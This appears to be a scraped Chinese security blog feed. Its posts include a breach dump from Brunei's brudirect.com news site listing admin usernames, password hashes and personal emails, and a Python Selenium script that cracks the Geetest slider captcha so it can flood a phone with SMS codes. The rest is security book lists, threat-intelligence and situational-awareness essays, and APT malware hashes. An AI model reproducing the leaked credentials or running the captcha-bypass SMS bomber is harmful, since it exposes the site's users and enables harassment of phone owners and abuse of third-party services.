文莱第一新闻网站被黑

文莱第一新闻网站被黑 2018黑帽大会工具清单-Blackhat

网址:http://www.brudirect.com/

site:http://www.brudirect.com/ (Brunei's No.1 News Website)
username admin,paswords,confirm paswords,email
Khairul Izwan   izwan   c9d329c0765777980e7c77dfb06ecccb    c9d329c0765777980e7c77dfb06ecccb    izzzwan3@gmail.com
brudirect   brudirect   f0fdd0e77cbdf633b826c34fec10ef3a    f0fdd0e77cbdf633b826c34fec10ef3a    ram86laksh@gmail.com
babypynk    babypynk    897c8fde25c5cc5270cda61425eed3c8    897c8fde25c5cc5270cda61425eed3c8    babypynk@gmail.com
brudirect   brudirect   d8600f103434f9ef240b73b5c8eac220    d8600f103434f9ef240b73b5c8eac220    ram86laksh@gmail.com
kalis       kalis       1cdf846eb3e43d5efe1ff2732f88fd7e    1cdf846eb3e43d5efe1ff2732f88fd7e    admin@ brudirect.com
vulnerablity:http://prntscr.com/jarjnp
brudirec_2k16db:
54vxsya_banner
54vxsya_comics
54vxsya_dprayertimes
54vxsya_erates
54vxsya_events
54vxsya_ferryschedules
54vxsya_flightschedules
54vxsya_greetings
54vxsya_marquee
54vxsya_movieschedules
54vxsya_news
54vxsya_photooftheday
54vxsya_poll
54vxsya_prayertimes
54vxsya_psi
54vxsya_quote
54vxsya_season
54vxsya_sungkaipromo
54vxsya_user
54vxsya_videooftheweek
54vxsya_weatherforecast
counter_ips
counter_values

The post 文莱第一新闻网站被黑 brudirect数据泄露 appeared first on 🔰雨苁ℒ🔰.

信息安全书籍

信息安全书籍 暗网网址大全

• Online-Security-Books

区块链安全书籍

• Hongri-Online-Security-区块链 – 大数据交易区块链技术应用标准
• Hongri-Online-Security-区块链 – 工信部区块链
• Hongri-Online-Security-区块链 – 华为区块链白皮书
• Hongri-Online-Security-区块链 – 中国区块链技术和应用发展白皮书
• Hongri-Online-Security-区块链 – 中国首个区块链标准《区块链参考架构》
• Hongri-Online-Security-区块链 – 区块链技术指南
• Hongri-Online-Security-区块链 – 区块链社会
• Hongri-Online-Security-区块链 – 精通比特币
• Hongri-Online-Security-区块链 – 区块链编程
• Hongri-Online-Security-区块链 – 区块链技术——通往未来的虫洞
• Hongri-Online-Security-区块链 – 区块链：技术驱动金融
• Hongri-Online-Security-区块链 – 红亚太学链之区块链技术深度剖析

红日安全Papers

• Hongri-Online-Security-Papers – Hr-Papers|宽字节注入深度讲解
• Hongri-Online-Security-Papers – Hr-Papers|Nmap渗透测试指南

红日安全专刊

• Hongri-Online-Security-Book – 红日Web安全新手入门专刊(第一期)
• Hongri-Online-Security-Book – Web安全开发实战（免费电子书下载）

安全优秀电子Papers

• Online-Security-GoodPapers – DEFCON 26黑客大会 | 议题下载
• Online-Security-GoodPapers – 先知白帽大会2018 | 议题下载
• Online-Security-GoodPapers – 2018DEFCON-PPT下载
• Online-Security-GoodPapers – 2018唯品会第三届安全峰会PPT下载
• Online-Security-GoodPapers – DC010 上海站 演讲
• Online-Security-GoodPapers – 2017滴滴安全大会PPT公开下载
• Online-Security-GoodPapers – 2018美团点评技术年货（合辑）
• Online-Security-GoodPapers – 携程技术2017年度合辑
• Online-Security-GoodPapers – 2017绿盟网络安全观察
• Online-Security-GoodPapers – 网络安全行业全景图
• Online-Security-GoodPapers – 网络安全行业研究报告
• Online-Security-GoodPapers -百度2017技术精选专刊
• Online-Security-GoodPapers -白帽学习之路-猪猪侠
• Online-Security-GoodPapers -自动化打造你的SSRF之路-猪猪侠
• Online-Security-GoodPapers -自动化攻击背景下的过去、现在与未来-猪猪侠
• Online-Security-GoodPapers -与业务融合的漏洞检测之路-猪猪侠

攻防比赛CTF – Writeup

• Online-Security- CTF – Writeup – 2018第二届强网杯Web Writeup
• Online-Security- CTF – Writeup – HCTF2017-官方Writeup
• Online-Security- CTF – Code – HCTF2017-官方比赛源码

信息安全书籍 Web安全书籍

• Online-WebBook – SQL基础教程
• Online-WebBook – SQL注入攻击与防御
• Online-WebBook – Web Hacking 101 中文版
• Online-WebBook – Kali Linux Web渗透测试秘籍 中文版
• Online-WebBook – Kali Linux burpsuite实战指南
• Online-WebBook – 渗透测试Node.js应用
• Online-WebBook – Web安全资料和资源列表
• Online-WebBook – Kali Linux Web 渗透测试秘籍 中文版
• Online-WebBook – 做好新型信息技术发展应用的信息安全等级保护工作
• Online-WebBook – 欺骗的艺术
• Online-WebBook – HTTP权威指南
• Online-WebBook – Web安全渗透剖析
• Online-WebBook – Web前端黑客技术揭秘
• Online-WebBook – Web应用安全威胁与防治
• Online-WebBook – Web应用漏洞侦测与防御
• Online-WebBook – 白帽子讲web安全
• Online-WebBook – 黑客渗透笔记完整版

Wi-Fi安全书籍

• Online-Wi-FiBook – Kali Linux 无线渗透测试入门指南 中文版
• Online-Wi-FiBook – 无线网络安全攻防实战进阶

POC编写安全书籍

• Online-PocBook – PoC 编写指南

PHP代码审计安全书籍

• Online-CodeBook – PHP代码审计
• Online-CodeBook – 论PHP常见的漏洞

Android安全书籍

• Online-AndroidBook – Android 渗透测试学习手册 中文版
• Online-AndroidBook – Android 渗透测试攻防实战中文版
• Online-AndroidBook – OWASP TOP10移动安全漏洞（安卓）

 信息安全书籍 Python编程书籍

• Online-PythonBook – Python基础教程(第2版)
• Online-PythonBook – Python灰帽子
• Online-PythonBook – Python安全编程
• Online-PythonBook – Python爬虫书籍
• Online-PythonBook – Python高级与网络编程
• Online-PythonBook – Python 安全编程教程
• Online-PythonBook – Python Web开发
• Online-PythonBook – Python Web开发实战
• Online-PythonBook – Python 网络攻防实战

安全会议PPT

• Online-Conference – 2012-2017安全会议资料
• Online-Conference – Black Hat USA 2017 议题 PPT
• Online-Conference – defcon 2017 PPT
• Online-Conference – OWASP亚洲峰会 2017 PPT

安全运维

• Online-Report – 日志分析技巧分享
• Online-Report – 日志管理与分析权威指南

信息安全书籍 渗透测试书籍

• 安全客2017季刊第一期电子书
• 安全客2017季刊第二期电子书
• Kali Linux 中文文档
• Kali Linux 秘籍 中文版
• 大学霸 Kali Linux 安全渗透教程
• Kali Linux 秘籍 中文版
• Metasploit v4 POC 上手指南
• Nmap 参考指南
• Wireshark 用户手册
• 灰帽攻击安全手册
• Nessus中文指南
• Nmap渗透测试指南
• 高度安全环境下的高级渗透测试
• 揭秘家用路由器0day漏洞挖掘技术
• 渗透测试实践指南：必知必会的工具与方法
• 渗透测试实践指南：必知必会的工具与方法
• 0day安全:软件漏洞分析技术(第2版)

网络安全分析书籍 信息安全书籍

• Kali Linux 网络扫描秘籍 中文版
• 网络安全与攻击工具
• 企业网网络安全系统
• 下一代网络安全.思科中国
• 图解TCP IP第5版
• 网络扫描技术揭秘
• 网络硬件设备完全技术宝典(第3版)
• 黑客大追踪：网络取证核心原理和实践

逆向安全书籍

• IDA Pro权威指南 (第2版)
• 捉虫日记
• 缓冲区溢出攻击-检测，剖析与预防
• Python灰帽子：黑客与逆向工程师的Python编程之道
• android逆向菜鸟速参手册完蛋版
• Android软件安全与逆向分析
• 逆向工程核心原理
• 恶意代码分析实战
• 逆向工程核心原理

社会工程师书籍

• 社会工程：安全体系中的人性漏洞
• 红客社会工程学
• 社会工程学

信息安全书籍 推荐书籍列表

• Online-JD
• online-新手推荐

The post 信息安全书籍 渗透剖析 黑客笔记 漏洞检测 appeared first on 🔰雨苁ℒ🔰.

The post 信息安全资源汇总 渗透测试靶场 黑客工具 appeared first on 🔰雨苁ℒ🔰.

什么是威胁情报 387个暗网网址

什么是威胁情报 其实安全圈一直在使用着它们，漏洞库、指纹库、IP信誉库，它们都是威胁情报的一部分。情报就是线索，威胁情报就是为了还原已发生的攻击和预测未发生的攻击所需要的一切线索。“所谓的威胁情报就是帮助我们发现威胁，并进行处置的相应知识。这种知识就是我们所说的威胁情报”。

互联网安全曾经历经了流氓互殴，侠客对决、黑社会火并等等阶段，现在已经形成了攻击者有组织有预谋，防御者有侦查有战术的局面——无论是攻击还是防御，都超越了点对点的战术，而越来越倚仗于全面的战法。简单来说，就是搞安全的不仅要看编程指南，还要看孙子兵法了。既然是正规军对垒，战法就要变得相对立体。所谓知己知彼，百战不殆。威胁情报，就像是八百里加急快报送来的敌情。

二战中，盟军依靠计算机之父图灵的天才破解了德国的密码，得知德国马上要对考文垂进行轰炸。但是为了争取更大的决定性胜利，盟军选择不让德国人知道对手已经破译了其密码。因此盟军方面没有对考文垂进行有针对性的的防御措施。于是德国人相信其密码依然是安全的，从而一步步走进了盟军的圈套。

在威胁情报中，安全公司同样运用类似的方法和黑客斗法。例如：穿梭各大安全论坛，装作黑客的样子，开心地与之讨论最近哪种攻击方式最流行，有哪些漏洞可以利用。然后回家修补漏洞。

于是，通过威胁情报，企业会对未来的攻击拥有免疫力，这就彻底改变了原本的攻防态势。原来也许黑客可以用上整整一年的攻击手段，一旦进入威胁情报，就被重点监控。如果攻击者第二次还在用同样的后门，就等于主动跑到了探照灯下。

某大神爆料，目前美国正在有计划有组织地曝光其他国家对其基础设施发动的攻击。这句话让人细思极恐，这表明美国已经拥有了一份精准的威胁情报，对其攻击者的攻击路径已经了如指掌。为了不打草惊蛇，其中有60%-70%的攻击路径，美国并没有曝光。没错，美国正在静静地看对手装X。

讲了什么是威胁情报，接下来说威胁情报有什么用？威胁情报给谁用？

从个人角度，如果提供代理IP，刷流量的人想要（绕过IP限制）；如果提供僵尸网络IP，安全防御者想要，其实攻击者也想要，攻击者要的总是比防御者多，所以Ta们更能达到目的。从公司角度而言，先说项目之间，做WAF的、做扫描器的、做漏洞管理平台的可以交换漏洞信息，做杀毒的和入侵检测的可以交换恶意样本信息，做业务欺诈的和做网络攻防的可以交换IP信誉信息，这些都是为了做到内部资源（扫描器，WAF，IPS等安全组件）甚至外部资源（开源资源集合、厂商资源交换）的整合（现状是公司越大，这些信息越碎片化），整合才能起到协同防御的效果，才能有能力地进行深度分析去发现真正有价值的攻击事件与高级的难以发现的APT定点攻击事件。

过去，我们将太多的精力放在实时防御上面，但并没有将威胁完全挡住，这个时代已经过去了。我们需要建立一个完整的防御体系，从防御、检测到响应，甚至通过威胁情报将攻击事件的预测做起来，而这一切的核心就是要掌握海量的数据，并具备强大的数据分析能力。威胁情报，是面向新的威胁形式，防御思路从过去的基于漏洞为中心的方法，进化成基于威胁为中心的方法的必然结果，它和大数据安全分析、基于攻击链的纵深防御等思想正在形成新一代的防御体系的基石。

威胁情报可以帮助人们解决如下问题：

• 如何跟得上包括恶意攻击、攻击方法、安全漏洞、黑客目标等等在内的如潮水般海量的安全威胁信息？
• 面对未来的安全威胁，如何获取更多的主动？
• 如何向领导汇报具体安全威胁的危险和影响？

from

“威胁情报”到底是什么鬼？

简单来说，威胁情报就可以帮助人们识别安全威胁并做出明确决定的知识

威胁情报最近备受关注。尽管对于威胁情报到底是什么有着许多不同的定义，但以下几条却是经常被引用的说法：

威胁情报是循证知识，包括环境、机制、指标、意义和可行性建议，现有的或新兴的、对资产的威胁或危害，可用于主体对威胁或危害的反应做出明确决定。

威胁情报就是收集、评估和应用关于安全威胁、威胁分子、攻击利用、恶意软件、漏洞和漏洞指标的数据集合。

为什么人人都在谈论“威胁情报”？

据《威瑞森2015年数据破坏调查报告》，预计2015年将发生安全事帮79790起，造成7亿条数据记录泄露，经济损失高达4亿美元。

只要安全威胁和数据泄露不断发生，任何企业都会想法设法去保护自己的数据。威胁态势总是不断变化，因为我们对IT系统的依赖，我们的业务风险也在不断增加,。

既有来自内部的安全威胁，也有来自外部的安全威胁。各单位为了有效地管理威胁，一直承受着巨大的压力，几乎不堪重负。尽管原始数据的信息唾手可得，且耗时很难，但要获得基于可设置有效衡量标准的有意义的信息却不是那么容易的事，而且耗时耗力。

这自然就把越来越多的用户推向了威胁情报，因为它有助于在海量数据、警报和攻击中对威胁进行优先级排列，并提供可操作的信息。

下表给出了几种可以由威胁情报源进行识别的常见的漏洞指标：

类别：网络

漏洞指标：

• IP地址
• 网址
• 域名

实例：恶意软件感染与已知的不法分子进行通讯的目标内部主机

类别：电子邮件

漏洞指标：

• 发件人邮件地址和邮件主题
• 邮件中的附件
• 邮件中的链接

实例：网络钓鱼通过内部主机尝试点击毫无戒心的电子邮件，并回传至恶意的命令与控制服务器

类别：基于主机

漏洞指标：

• 文件名和文件哈希表（例如MD5）
• 注册表键
• 动态链接库（DLL）
• 互斥对象名

实例：来自可能会自我感染或已经感染的主机的外部攻击

威胁情报能力

攻击可以大致归为基于用户、基于应用程序和基于基础设施的威胁。一些最常见的威胁包括SQL注入、DDoS、web应用攻击和网络钓鱼攻击等等。

拥有一套可以提供情报能力通过主动出击和及时响应来管理这些攻击的安全解决方案是至关重要的。攻击者不断改变其方法来挑战安全系统。因此，对于各单位来说，就不可避免地要从各种各样的来源获取威胁情报。

一种被证明行之有效的掌控攻击的方法，就是通过安全信息和事件管理系统（SIEM）来发现和应对威胁。安全信息和事件管理系统可以用来追踪环境中所发生的一切，识别异常活动。孤立事件可能看起来无关紧要，但与事件和威胁情报关联起来，你会发现环境中到底发生了什么。

如今，IT安全专家必须要在假定发生数据泄露的心态下工作。比较威胁情报中针对已知不法分子的监控流量，来自有助于识别恶意活动。

然而，这样的措施可能需要手动操作，而且耗时耗力。将基于威胁情报的指标集成到一套安全信息和事件管理系统安全解决方案，将有助于识别受损系统，甚至可能阻止部分攻击。

最佳实践

通过整合威胁情报和应对袭击对抗格局不断变化的威胁是远远不够的。你需要分析形势，确定可能面临的威胁，在此基础上提出预防措施。

这里有几条最佳实践谨供参考：

• 拥有一份应用程序白名单和黑名单。这会有助于防止恶意的或未经批准的程序的执行，包括DLL文件、脚本和安装程序。
• 仔细检查日志，看看未遂袭击是不是孤立事件，或者该漏洞之前是否被利用过。
• 确定未遂攻击中发生了哪些变更。
• 审计日志并确定此事件为什么事件发生——原因可以大到系统漏，小到驱动过时。

威胁情报为安全信息和事件管理系统带来了什么

类似SolarWinds日志事件管理器之类的安全信息和事件管理系统从监控流量中收集和规范日志数据，并对可疑事件自动进行标记。

有了集成威胁情报机制和内置规则，监控事件可以对不断更新的已知威胁列表进行比对。

您可以通过实时日志数据快速搜索并监控来自攻击的点击，识别常见的漏洞指标。

您可以对已知恶意IP地址自动响应，以防恶意攻击的企图。

from

The post 什么是威胁情报 漏洞库 指纹库 IP信誉库 appeared first on 🔰雨苁ℒ🔰.

什么是态势感知 攻击比特币交易所

什么是态势感知

态势感知 具体是研究哪些内容?首先要做的当然是要去百度一下，百度百科上只给了一句话——“在大规模系统环境中，对能够引起系统态势发生变化的安全要素进行获取、理解、显示以及预测未来的发展趋势。”下面，我就通过我的搜索和总结，简单梳理一下到底什么是态势感知（网络安全方向）。

所谓网络态势是指由各种网络设备运行状况、网络行为以及用户行为等因素所构成的整个网络当前状态和变化趋势。网络态势感知是指在大规模网络环境中，对能够引起网络态势发生变化的安全要素进行获取、理解、显示以及预测最近的发展趋势。

“态势”不是“事件”

“小李，隔壁老王趁你上班去你家了”—— 这是事件；

　　“小李，我感觉隔壁老王看你老婆的眼神不太对，你要多关注” —— 这是态势；

所以可以说，事件是必然性的结果，即便是预测事件也应该是精确度较高的一种推测 —— 这更像是用数学公式推算出一个确定性的数字。而态势是趋势，加上感知两个字后那就是对趋势的预测。

“态势”与“情报”

情报是一种基于公开或非公开信息的必然性较高的预测。

网络安全态势感知包括三个级别，第一是能够感知攻击的存在；第二是能够识别攻击者，或攻击的意图；最高级别是风险评估，通过对攻击者行为的分析，评估该行为（包括预期的后续动作）对网络系统有什么危害，从而为决策提供重要的依据。

越来越多的设备接入互联网，所产生的数据量是非常庞大的，大数据所蕴含的价值是无穷的，我们可以利用大数据进行商业价值分析，攻击者也可以利用大数据进行破坏。而态势感知在我看来，就是大数据与安全防护的结合。

基于大数据的全网安全态势感知技术是未来信息安全发展的一个方向。如今信息安全所面临的威胁和挑战已经上升到了更高的层面，网络战早已不再是传说，这给安全防护带来了非常大的挑战，在大规模的APT攻击下，没有哪家企业和个人能够抵御住如此规模的攻击，因此，安全防御也需要做到全网联动、共同防御。

大数据安全态势感知通过部署在全国各地的监测节点，可以对全网进行实时的监控，对于可能出现的攻击行为进行预警，对用户的网络安全做到规模化防护。规模化的防护从三个方面来实现，一是云防护网络，通过在全国部署的云防护节点，对用户系统提供抗DDOS、应用层安全防护、重大安全事件预警等功能;二是流量清洗，为用户系统提供清洗防护设备，进行可管理的防御和监控;三是蜜罐监测，通过构建蜜罐对众多的攻击和渗透进行诱捕，对新样本进行采集，降低风险，同步收集最新的安全态势等信息。

from

态势感知是什么?

态势感知的概念最早是由美国空军提出，是为提升空战能力，分析空战环境信息、快速判断当前及未来形势，以作出正确反应而进行的研究探索。

上世纪90年代这个概念被引入了信息安全领域，最知名的2003年开始的美国的爱因斯坦计划(正式名称国家网络空间安全保护系统The National Cybersecurity Protection System)，2013年已经开始第三期的建设，美国CERT及后续DHS(国土安全部)对态势感知进行了不断探索。

美国国家安全系统委员会对态势感知的定义是：“在一定的时间和空间范围内，企业的安全态势及其威胁环境的感知。理解这两者的含义以及意味的风险，并对他们未来的状态进行预测。”态势感知是偏重于检测和响应分析能力的建设，这确实是现实最迫切的安全需要。

为什么需要态势感知?

面对新的安全形势，传统安全体系遭遇瓶颈，需要进一步提升安全运营水平的同时积极的开展主动防御能力的建设。

从美国对爱因斯坦计划的持续不断投入，可以看到网络空间安全的态势感知，对于国家、行业有多么重要的意义。我国的网络安全形势非常严峻，截止2016年底，仅360公司就累计监测到针对中国境内目标发动攻击的APT组织36个，最近仍处于活跃状态的APT组织至少有13个，这些组织的攻击目标涵盖了政府机关、高校、科研机构以及关键基础设施的行业/企业。今年爆发的WannaCry勒索蠕虫，更让我们看到了网络武器民用化之后可能造成的巨大灾害。

从现实中的网络安全建设看，多年来我们一直偏重于架构安全(漏洞管理、系统加固、安全域划分等)和被动防御能力(IPS、WAF、AV等)的建设，虽取得了一定的成果，也遇到发展瓶颈。简单通过购买更多的安全设备已经不能使安全能力有提升，需要进一步提升安全运营水平的同时积极的开展主动防御能力的建设。在之前建立了一定自动化防御能力的基础上，开始增加在非特征技术检测能力上的投入，以及事件响应分析能力的建设;并通过对事件的深度分析及信息情报共享，建立预测预警并针对性改善安全系统，最终达到有效检测、防御新型攻击威胁之目的。

正是因为这些现实的问题，习总书记才会在4.19讲话中明确提出建设“全天候全方位感知网络安全态势 ”。

态势感知能干什么?

网络安全与战争一样，本质是攻防双方的对抗，攻防之战，速度为王，作为防守方的目标是缩短攻击者的自由攻击时间。态势感知系统的作用就是分析安全环境信息、快速判断当前及未来形势，以作出正确响应。

“全天候全方位感知网络安全态势”对态势感知的建设目标做出了准确描述。全天候全方位，可以理解为时间维度和检测内容维度。

在时间维度上，需要利用已有实时或准实时的检测技术，还需要通过更长时间数据来分析发现异常行为特别是失陷情况。

在内容维度上，也需要覆盖网络流量、终端行为、内容载荷三个方面。要完整提供以下5类检测能力，或者说至少4类(参照Gartner：Five Styles of Advanced Threat Defense )：

基于流量特征的实时检测(WAF、IPS、NGFW等)

基于流量日志的异常分析机制(流量传感器、Hunting、UEBA)

针对内容的静态、动态分析机制(沙箱)

基于终端行为特征的实时检测(ESP)

基于终端行为日志的异常分析机制(EDR、Hunting、UEBA)

“态”指是从全局角度看到的现状，包括组织自身的威胁状态和整体的安全环境，需要基于之前提到的5种检测能力尽可能的发现攻击事件或攻击线索，同时需要对涉及到的报警提供进一步的分析，回答以下的问题：

• 是真实的攻击吗?是否可能误报?是否把扫描识别为真实攻击?
• 是什么性质的攻击?定向或者随机?
• 可能的影响范围和危害
• 缓解或者清除的方法及难度

无法正确的回答这些问题，只是简单的将报警在地图上呈现就无法体现有现实价值的“态”，无法确定是否可以进入处置流程。

“势”，即未来的状态。要能预测组织未来的安全状态，需要对现阶段所面临的攻击事件特别是定向攻击事件有深入的了解：

• 是新的攻击团队还是已知团伙
• 攻击者的意图
• 攻击者的技战术水平及特点
• 是否属于一次大型战役的一部分

了解这些信息，同时通过信息和情报共享，对同行业或相似部门的相关此类信息也有所了解，就能够预测未来可能处于的安全状态以及需要防御的重点，即预测预防能力。

谁能做态势感知?

要完成态势感知的建设目标，需要具备以下三大核心要素：流量数据采集、威胁情报和安全分析师。

流量数据采集相对而言实施难度较小，同时还有着不可替代的价值：通过流量日志进行安全狩猎或者异常检测、分析攻击事件的影响范围、回溯完整的攻击链和TTP(战术、技术和过程)。因此流量数据是态势感知中必须考虑的一环。

威胁情报是随着新型威胁防御快速成长的一个领域，在态势感知建设中有着决定性的作用。最经常被提到的一类是可机读情报(MRTI)，主要是赋能给安全产品，增强或升级其安全能力。

为了帮助安全分析师完成对事件的分析，威胁情报领域内提供了专业的情报分析工具(情报分析平台/关联分析平台)，分析师通过这样的平台可以方便的完成过去付出极大体力和脑力也难以进行的工作：

• 判定一个攻击是否属于已知攻击
• 查找和攻击相关的网络基础设施(域名、主机)及样本
• 了解这些基础设施和样本的详情
• 判定攻击是否和某个已知团伙相关并了解这个攻击团伙的基本情况

威胁情报中还有一类TTP类型的情报，属于人读的情报，主要针对已发生的重要安全事件，分析攻击者的攻击范围、攻击目的、具体的技战术手法和攻击过程，并提炼出防御建议。

流量数据和威胁情报都很重要，但它们能发挥多大作用，最终还是要依赖与人的力量，其中最重要的是安全分析师，是安全运营中的高级人才。安全分析师的成长需要较好的环境(如数据和情报)、以及大量的实战机会，难以大批量培养。安全分析师是态势感知必须倚重的重要部分，是确定态势感知项目成败的又一个关键因素。成功的态势项目必须考虑到如何引入或培养这样的人才，并通过提供好的工具和流程来支撑他们高效的完成任务。

态势感知是综合性的安全能力建设，流量数据、威胁情报以及安全分析师是影响项目成败的关键因素，另外大数据平台、可视化、资产管理等也很重要。

如何建设态势感知?

态势感知建设是个复杂的系统工程，分阶段建设是一种必要、稳妥的方法。

以下综合态势感知中涉及的主要方面，给出一些阶段性的划分意见：

1. 基于特定组织，完成内部态势感知基本建设

这个阶段的建设内容主要包括：数据和报警的收集、威胁情报平台、事件分析研判平台、内部处置管理平台以及呈现、辅助完成这些工作的可视化应用。这样在一个单位内部可以支撑完整的安全运营。其中需要的安全分析师可以通过购买外部服务的方式获得。

2. 建立纵向支撑体系以及情报数据共享体系

这个阶段的建设包括纵向的恶意代码分析中心、增强的事件分析中心、以及情报分享机制和纵向威胁情报中心。恶意代码分析和重大事件分析是需要高水平的安全分析师的，利用纵向的建设，集中使用这些资源，可以更快的提升整体运营水平，也有利于安全分析师的培养。情报分享机制保障信息在行业内部以及和公安、网信等部门的同步，同时通过纵向威胁情报中心收集、处理、分发内部情报信息，对整个行业或组织面临的威胁有一个更精准、全面的掌控，让关键性情报可以更迅速、有效的使用。

3. 建立整体性自动化防御能力

到了这个阶段，随着纵向支撑体系和整体情报分析能力的增强，遇到关键事件可以进行整体化防护，如自动化配置相关的NGFW、IPS或邮件网关设备，再如利用内部的DNS系统对特定的DNS解析进行重定向(Sinkhole)等，利用这些手段更快速、高效的进行遏抑攻击事件，为清除攻击争取时间。

一个安全体系尤其是态势感知这样的复杂体系，在体系建设前，建议先和专业的咨询机构和专业的安全服务商一起进行咨询、规划，作为前期的配合工作。

选择什么合作伙伴?

态势感知的建设需要明确建设目标、掌控好关键性因素、分阶段开展相关的建设。这个过程中选择适合的伙伴就特别重要。

和什么样的伙伴合作能够获得最重要的威胁情报、安全分析师资源，得到成熟的流量数据解决方案，是需要仔细考量的问题。但我们可以乐观的看到，早年曾经制约态势感知能力建设的数据平台和威胁情报能力、高级别的安全分析师资源，在近几年都有了快速的发展，有相应的优质资源可以获得。相信通过一段时期的态势感知建设，我国的网络空间安全水平会有一个整体的提升，有足够的能力去更好面对来自网络犯罪团伙、意识形态黑客以及国家级别的攻击威胁。

from

The post 什么是态势感知 防患于未然 预警 预测 appeared first on 🔰雨苁ℒ🔰.

极验验证码破解 实现短信轰炸

极验验证码破解 先上代码 黑客书籍

#! python3
# coding:utf-8

import time,random
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
import logging

logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s -%(message)s')

phoneNum = '13456788765'
# initial offset
initial_offset = 10
URLs = ['https://biaodan.info/q/7sisis']

#TODO get html elements
def sendPhone(driver, phoneNum, phoneInputClass, sendPhoneButtonId):
  # driver = webdriver.Chrome()
  logging.debug('Send Phone Start')
  phoneInput = driver.find_element_by_class_name(phoneInputClass)
  phoneInput.send_keys(phoneNum)
  time.sleep(2)
  sendBtn = driver.find_element_by_id(sendPhoneButtonId)
  sendBtn.click()
  time.sleep(5)

#TODO compare Captcha & return tarck
def elementsScreenshot(driver, bgImgClass, dragBallClass):
  # driver = webdriver.Chrome()
  logging.debug('start make background screenshot')
  driver.find_element_by_class_name(bgImgClass).screenshot('bg_full.png')
  time.sleep(2)
  ball = driver.find_element_by_class_name(dragBallClass)
  ActionChains(driver).click_and_hold(ball).perform()
  ActionChains(driver).move_by_offset(190, 0).perform()
  # move the ball to right
  # this is important
  time.sleep(0.5)
  driver.find_element_by_class_name(bgImgClass).screenshot('cut.png')
  # move the ball to left
  ActionChains(driver).move_by_offset(-30, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-50, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-40, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-30, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-40, 0).perform()

def dragBall(driver, track, dragBallClass):
  ball = driver.find_element_by_class_name(dragBallClass)
  logging.debug('ball start move')
  # simulate human's behave
  while track:
    len = random.choice(track)
    ActionChains(driver).move_by_offset(len, 0).perform()
    track.remove(len)
    logging.debug(track)
    time.sleep(len/10)
  imitate2L = ActionChains(driver).move_by_offset(-2, 0)
  imitateL = ActionChains(driver).move_by_offset(-1, 0)
  time.sleep(0.015)
  imitate2L.perform()
  time.sleep(0.04)
  imitateL.perform()
  time.sleep(0.04)
  imitate2L.perform()
  time.sleep(0.04)
  imitateL.perform()
  time.sleep(0.04)
  imitate2L.perform()
  ActionChains(driver).pause(random.randint(6, 10) / 10).release(ball).perform()

def getTrack(distance):
  logging.debug('calcute distance track')
  # simulate human's hebace s = 1 / 2 a t t
  track =[]
  current = 0
  mid = distance * 3 / 4
  t = random.randint(2, 3) / 10
  v = 0
  logging.debug('1')
  while current < distance:
    if current < mid:
      a = 2
    else:
      a = -3
    v0 = v
    v = v0 + a * t
    move = v0 * t + 1 / 2 * a * t * t
    current += move
    track.append(round(move))
    logging.debug(track)
  return track

# TODO compare two img
def compareImg(img1, img2, x, y):
  logging.debug('compare img start')
  pix1 = img1.load()[x, y]
  pix2 = img2.load()[x, y]
  threshold = 60
  if (abs(pix1[0] - pix2[0] < threshold) and abs(pix1[1] - pix2[1] < threshold) and abs(pix1[2] - pix2[2] < threshold)):
    return True
  else:
    return False

def getOffset(bgFullPath, bgPath):
  logging.debug('get img offset')
  bg_full = Image.open(bgFullPath)
  bg = Image.open(bgPath)
  left = initial_offset
  for width in range(left, bg_full.size[0]):
    for height in range(bg_full.size[1]):
      if not compareImg(bg_full, bg, width, height):
        left = width
        return left
  return left
#TODO execute Crack it

def main(driver):
  logging.debug('main() start')
  for url in URLs:
    driver.get(url)
    logging.debug('%s get html', url)
    time.sleep(3)
    sendPhone(driver, phoneNum, 'filter-input', 'btnSendCode')
    elementsScreenshot(driver, 'gt_cut_fullbg', 'gt_slider_knob')
    distance = getOffset('bg_full.png', 'cut.png')
    # logging.debug('%s',distance)
    track = getTrack(distance)
    dragBall(driver, track, 'gt_slider_knob')
    time.sleep(3)

if __name__ == '__main__':
  driver = webdriver.Chrome()
  for i in range(1, 2):
    logging.debug('%s Test', i)
    try:
      main(driver)
    except:
      print("%d Error", i)
      pass
  driver.close()
  driver.quit()

在部分进行安全渗透测试的场景下，需要对手机号进行短信轰炸操作，无奈不想在这方面增加投入，无意中看到了表单大师的部分网站提供短信验证码服务，但是每次需要进行验证，于是便有了本篇交流。
某个主页（无恶意，搜索引擎得到）

随意输入的号码，然后点击发送，出现验证码

要实现网站群发的话要具备以下几个条件
1、一定数量的发送验证码服务的网站（每个页面有一个时间限制，限制120s后再次发送，但是根据后期实践效果，不需要等待120s，但是间隔一段时间可以提高验证码的成功率）
2、webdriver+selenium实现爬虫，自动化操作
3、就是实现代码了，在github上有其他人的实现代码，但是在表单大师上表现效果不佳，所以便有了以下实现

开始实现了
首先引入库，部分变量申明

找到电话号码输入框，模拟输入电话号码

代码实现

验证码图片元素（采用区域截图方式，快速，方便，而且很准确，极验的这张图片，是无法通过元素审查直接得到下载地址，是一片一片拼成的）

代码实现

然后获取要操作的元素（就是拉动的那个球）

代码实现

在后面就是在验证码活动的过程中的轨迹计算，首先通过比较图片元素的不同，获得要到达的地点（这就是之前截图时将滑块移到最右边，确保第一次计算出来的不同就是要移动的终点，移动轨迹的算法参考了网上的实现，简单来讲就是s=v0t+1/2at^2）



到这里，基本就已经结束了，接下来就是主程序了

其实这也可以用于采用了极验的其他场合，大家自己修改
代码上传github，欢迎大家fork，star
https://github.com/xtom598/geeTestCode

from

The post 极验验证码破解 实现短信轰炸 模拟用户滑动解锁 appeared first on 🔰雨苁ℒ🔰.

毒云藤 攻击比特币交易所

毒云藤 PDF版本下载链接: 毒云藤

a5d9edaa1b6cf820d54c19b2c6bd246d

2fa75fdf4d57c182bc6c0438dd6cbf27

b04d7fa1c7e3a8274ba81f48f06a5f4e

Backdoor.Win32.FakeWinupdate

19365fddc2fca8735d51def001704db3

07561810d818905851ce6ab2c1152871

类型	                          MD5	                文件名	                        病毒名
邮件附件	9fb6866c2cdd49387a520f421a04b882	中科院2013年研究项目材料.doc	virus.exp.20120158
释放的PE	f3ed0632cadd2d6beffb9d33db4188ed	update.exe	                Backdoor.Win32.PoisonIvy

